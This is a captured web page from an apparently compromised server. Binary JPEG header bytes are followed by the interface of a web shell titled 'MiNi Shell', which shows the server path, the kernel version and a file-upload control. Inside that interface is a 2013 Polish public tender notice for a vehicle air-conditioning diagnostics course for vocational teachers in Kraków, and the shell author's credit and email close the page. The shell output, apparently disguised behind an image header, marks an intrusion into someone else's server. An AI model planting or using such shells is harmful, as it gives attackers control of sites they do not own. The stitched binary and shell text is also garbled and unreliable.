JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131112/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131112/238073-N-2013.html

<p class="kh_header"><b>Kraków: Zorganizowanie i przeprowadzenie  kursu Diagnostyka obsługi i naprawa układów klimatyzacji pojazdów samochodowych, w ramach projektu Modernizacja Systemu Doskonalenia Kadr Szkół Zawodowych w Małopolsce. Znak sprawy: MSD- ZP/271/18/2013</b><br>
<b>Numer ogłoszenia: 238073 - 2013; data zamieszczenia: 12.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolskie Centrum Doskonalenia Nauczycieli , ul. Lubelska 23, 30-003 Kraków, woj. małopolskie, tel. 12 623-76-56, 623 76 46, faks 12 623 77 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mcdn.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie  kursu Diagnostyka obsługi i naprawa układów klimatyzacji pojazdów samochodowych, w ramach projektu Modernizacja Systemu Doskonalenia Kadr Szkół Zawodowych w Małopolsce. Znak sprawy: MSD- ZP/271/18/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zorganizowanie i przeprowadzenie  kursu Diagnostyka obsługi i naprawa układów klimatyzacji pojazdów samochodowych, w ramach projektu Modernizacja Systemu Doskonalenia Kadr Szkół Zawodowych w Małopolsce.
2.Zamówienie publiczne udzielane jest zgodnie z ustawą z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 tekst jednolity z późniejszymi zmianami) w trybie przetargu nieograniczonego.
3. Opis przedmiotu zamówienia
3.1. Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie kursu Diagnostyka obsługi i naprawa układów klimatyzacji pojazdów samochodowych, w ramach projektu Modernizacja Systemu Doskonalenia Kadr Szkół Zawodowych w Małopolsce. 
3.2.Celem szkolenia jest:
a/dostarczenie uczestnikom umiejętności i kwalifikacji niezbędnych w branży mechaniczno - mechatronicznej w zakresie budowy, eksploatacji, konserwacji i napraw układów klimatyzacji pojazdów samochodowych 
b/przygotowanie uczestników kursu do kształcenia u ucznia umiejętności z zakresu  budowy, eksploatacji, konserwacji i napraw układów klimatyzacji pojazdów samochodowych  
3.3 Kurs powinien obejmować 50 godzin dydaktycznych, z tego 20 [h] to godziny zajęć teoretycznych, a 30 [h] to godziny zajęć praktycznych wraz z egzaminem. 
3.4.Program kursu musi obejmować następujące bloki tematyczne:
A. Zajęcia teoretyczne:
1.Teoretyczne podstawy chłodnictwa i klimatyzacji, wpływ na środowisko czynników   chłodniczych, wykorzystywanie właściwości fluorowanych gazów cieplarnianych, rozporządzenia WE, odzyskiwanie fluorowanych gazów cieplarnianych, obsługa butli zawierające czynniki chłodnicze - 2[h]
2. Przepisy prawne dotyczące emisji gazów fluorowych -2[h]
3. Budowa układów klimatyzacji samochodowych z czynnikami CO2, R22, R134a, 1234VF -2[h]
4. Typy i budowa sprężarek -2[h]
5. Budowa parowników -2[h]
6.Budowa skraplaczy -2[h]
7.Budowa zaworów rozprężnych, przewodów, zaworów -2[h]
8. Aparatura kontrolno-pomiarowa w układach klimatyzacji -2[h]
9. Podstawowe usterki w układach klimatyzacji, sposoby ich weryfikacji i naprawy -2[h]
10.Urządzenia serwisowe układów klimatyzacji-2[h]
B. Zajęcia praktyczne:
1. Demontaż, weryfikacja i montaż elementów układów klimatyzacji -5[h]
2.Czyszczenie, dezynfekcja układów klimatyzacji -5[h]
3. Wykonywania połączeń lutowanych w układach w różnych technologiach (lutowanie elektryczne, propan-tlen, acetylen-tl
4. Wymiana czynników chłodniczych -5[h]
5.Wymiana olejów i filtrów -5[h]
6.Kontrola parametrów pracy układów klimatyzacji stanowiskowa i na pojeździe -5[h]   
3.5. Etap I  przedmiotu zamówienia-zorganizowanie i przeprowadzenie  kursu Diagnostyka obsługi i naprawa układów klimatyzacji pojazdów samochodowych, w ramach projektu Modernizacja Systemu Doskonalenia Kadr Szkół Zawodowych w Małopolsce.    
3.6. Zakres przedmiotu zamówienia w zakresie etapu I obejmuje:
a/ przeprowadzenie kursu dla 14 nauczycieli przedmiotów zawodowych szkół zawodowych   w Małopolsce. Kurs obejmuje 50 godzin dydaktycznych z tego co najmniej 30 godzin zajęć praktycznych przy założeniu, że 1 godzina dydaktyczna = 45 minut.
b/ przygotowanie szczegółowego programu kursu w oparciu o bloki tematyczne o których mowa w pkt. 3.4 specyfikacji.
c/ przygotowanie harmonogramu kursu w oparciu o wcześniej przygotowany program kursu.
d/ zapewnienie kadry kursowej w ilości min. 3 osób 
e/ prowadzenie dokumentacji kursu (łącznie z fotograficzną- min. 10 zdjęć) i przekazanie jej (po zakończeniu kursu) do Zamawiającego
f/ opracowanie, powielenie i przekazanie każdemu uczestnikowi kursu niezbędnych materiałów szkoleniowych, takich jak: skrypt dydaktyczny, instrukcji obsługi i konserwacji układów klimatyzacji.
g/ zapewnienie uczestnikom poczęstunku w postaci kawy, herbaty, ciasteczek itp.
3.7. Wykonawca winien podczas kursu:
a/zabezpieczyć pełny zestaw materiałów  do szkolenia, w tym: skrypt dydaktyczny, instrukcja obsługi i konserwacji układów klimatyzacji, instrukcja obsługi sprzętu wchodzącego w skład stacji diagnostycznej w zakresie obsługi układów klimatyzacji, filmy dydaktyczne,
b/zapewnić każdemu uczestnikowi zestawu: zapewnić każdemu uczestnikowi zestawu: skrypt dydaktyczny, instrukcja obsługi i konserwacji układów klimatyzacji, instrukcja obsługi sprzętu wchodzącego w skład stacji diagnostycznej w zakresie obsługi układów klimatyzacji,
c/zapewnić na czas kursu i przekazać po zakończeniu kursu materiały dydaktyczne i  pomoce dydaktyczne do przeprowadzenia kursu takie jak:
I. Stacja do obsługi klimatyzacji o następujących parametrach/wymaganiach:
-  pełny automat
- automatyczne odzyskiwanie czynnika i oleju
- automatyczny test ciśnienia w systemie A/C
-automatyczne i programowalne wytwarzanie próżni
-automatyczne wykrywanie nieszczelności
-dozowanie kontrastu UV
-zintegrowana baza danych ilości czynnika
-zintegrowana drukarka
- długie przewody serwisowe
-przystawka płucząca(opcjonalnie)
-zestaw do kontroli ilości czynnika (opcjonalnie)
-sprężarka wyd.min.500[g/min]
-pompa próżniowa wyd.min.180[l/min]
-zbiornik na czynnik : min.20[kg]
II. Prasa do zaciskania przewodów klimatyzacji 
III. Zestaw manometrów do kontroli szczelności 
IV. Uniwersalny ściągacz do sprzęgieł klimatyzacji 
V. Przyrząd do demontażu dławików z zestawem zaworków 
VI. Zawór hermetyczny 
VII. Obcęgi do przewodów gumowych 
VIII. Narzędzi do przewodów metalowych 
IX. Termometr laserowy bezdotykowy -50 do +550 stopni C (pirometr) 
X. Urządzenie do dezynfekcji - urządzenie wytwarzające ozon do dezynfekcji- wytwarzanie ozonu poprzez
 Jonizację powietrza o następujących wymaganiach i parametrach :
-wydajność : 3 [l/min.], 0,250 [gO3/h]
-sonda rozprowadzająca ozon na długim elastycznym przewodzie
X. Elektroniczny przyrząd do kontroli nieszczelności 
XI. Barwnik UV 1 Litr 
XII. Zestaw do płukania klimatyzacji manualny 
XIII. Płyn do płukania układu klimatyzacji 5L 
XIV. Zmywacz UV 
XV. Zestaw oringów 
XVI. Zestaw sprężynek 
XVII.	Zestaw do kontroli szczelności 
XVIII.	lampa UV+ okulary	
3.8. Wykonawca winien zabezpieczyć sale dydaktyczną z pełnym wyposażeniem technicznym do zajęć teoretycznych i praktycznych takich jak stacja diagnostyczna zewnętrzna lub pracownia warsztatów szkolnych przygotowanych do prowadzenia zajęć z dziedziny techniki samochodowej o powierzchni minimum 40 m2.
3.9. Etap II przedmiotu zamówienia- przeprowadzenie  egzaminu końcowego składającego się z części teoretycznej i praktycznej, potwierdzonego wydaniem stosownego certyfikatu lub zaświadczenia, którego zakres obejmuje:
a/ przeprowadzenie egzaminu składającego się z części teoretycznej (test) i praktycznej dla 14 nauczycieli - uczestników kursu
b/ sporządzenie protokołu z egzaminu i przekazanie jego kopii Zamawiającemu.
c/ wydanie uczestnikom kursu certyfikatu lub zaświadczeń.
3.10. Miejscem przeprowadzenia kursu i przeprowadzenia egzaminu jest miasto Gorlice.
3.11.Szczegółowy opis przedmiotu zamówienia oraz sposób realizacji zamówienia zawiera załącznik nr 2 do SIWZ  -wzór umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż dysponuje kadrą szkoleniową, która będzie uczestniczyć w wykonywaniu zamówienia w postaci minimum 3 osób-trenerów, posiadających następujące kwalifikacje/doświadczenie:
Jedna osoba- Trener 1
- wykształcenie wyższe techniczne kierunkowe w specjalności: samochody 
- min.5  letnie doświadczenie w prowadzeniu szkoleń z zakresu diagnostyki pojazdów 
   samochodowych 
-uprawnienia i certyfikat: rzeczoznawcy-weryfikatora  Stowarzyszenia Inżynierów i Techników Samochodowych,
-  uprawnienia pedagogiczne
Jedna osoba- Trener 2
- wykształcenie wyższe techniczne kierunkowe w specjalności: samochodowo-motoryzacyjnej
- min.5 letnie doświadczenie w prowadzeniu szkoleń z zakresu diagnostyki pojazdów 
   samochodowych - Stacje Kontroli Pojazdów
-uprawnienia i  certyfikat: w zakresie kontroli i nadzoru diagnostycznego pojazdów samochodowych,
- uprawnienia pedagogiczne
Jedna osoba- Trener 3
- wykształcenie wyższe: kierunek inżynieria środowiska 
- min.5 letnie doświadczenie w prowadzeniu szkoleń z zakresu ochrony i inżynierii środowiska
- uprawnienia i certyfikat:  rzeczoznawca z zakresu ochrony środowiska, lub Certyfikat Audytora wewnętrznego zintegrowanego systemu zarządzania wg norm ISO  9001, ISO 14001 i PN-N-18001
Ocena spełnienia warunku będzie dokonywana metoda 0 - 1, tj. spełnia/nie spełnia, w oparciu o  oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ, wykaz osób -wzór załącznik nr 5 do SIWZ i oświadczenie wzór załącznik nr 6 do SIWZ dołączone do oferty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku będzie dokonywana metodą 0 - 1, tj. spełnia/nie spełnia, w oparciu o oświadczenie dołączone do oferty, którego wzór stanowi załącznik nr 3 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pozostałe wymagane dokumenty:
1.wypełniony i podpisany przez Wykonawcę lub przez osoby upoważnione do reprezentowania Wykonawcy formularz oferty - według wzoru stanowiącego załącznik nr 1 do specyfikacji, 
2.pełnomocnictwo (pełnomocnictwa) dołączone w formie oryginału lub notarialnie poświadczonej kopii albo kopii poświadczonej za zgodność z oryginałem przez osoby udzielające pełnomocnictwa, jeśli oferta będzie podpisywana przez pełnomocnika, przy czym dotyczy to również przypadków składania ofert przez podmioty występujące wspólnie, czyli uczestników konsorcjum
3.podpisana przez Wykonawcę lub przez osoby upoważnione do reprezentowania Wykonawcy lista podmiotów wraz z oświadczeniem należących do tej samej grupy kapitałowej (grupa kapitałowa w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów Dz. U. Nr 50, poz. 331, z pózn. zm.), o której mowa w art. 24 ust. 2 pkt 5 ustawy lub informacja w formie oświadczenia o tym, że wykonawca nie należy do grupy kapitałowej, sporządzona według wzoru stanowiącego załącznik nr 4a lub 4b do specyfikacji,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w zakresie:
1.zmiany wysokości stawki VAT,
2.zmian osób, które będą uczestniczyć w wykonywaniu zamówienia.
Ewentualna zmiana składu osobowego może nastąpić wyłącznie za zgodą Zamawiającego, o ile Wykonawca zapewni osoby które posiadają nie niższe kwalifikacje i doświadczenie, których wymagał Zamawiający</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mcdn.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Małopolskie Centrum Doskonalenia Nauczycieli,
ul. Lubelska 23, 30-003 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.11.2013 godzina 09:30, miejsce: Małopolskie Centrum Doskonalenia Nauczycieli,
ul. Lubelska 23, 30-003 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt Modernizacja systemu doskonalenia kadr szkół zawodowych w Małopolsce, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.4 Wysoko wykwalifikowane kadry systemu oświaty. Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com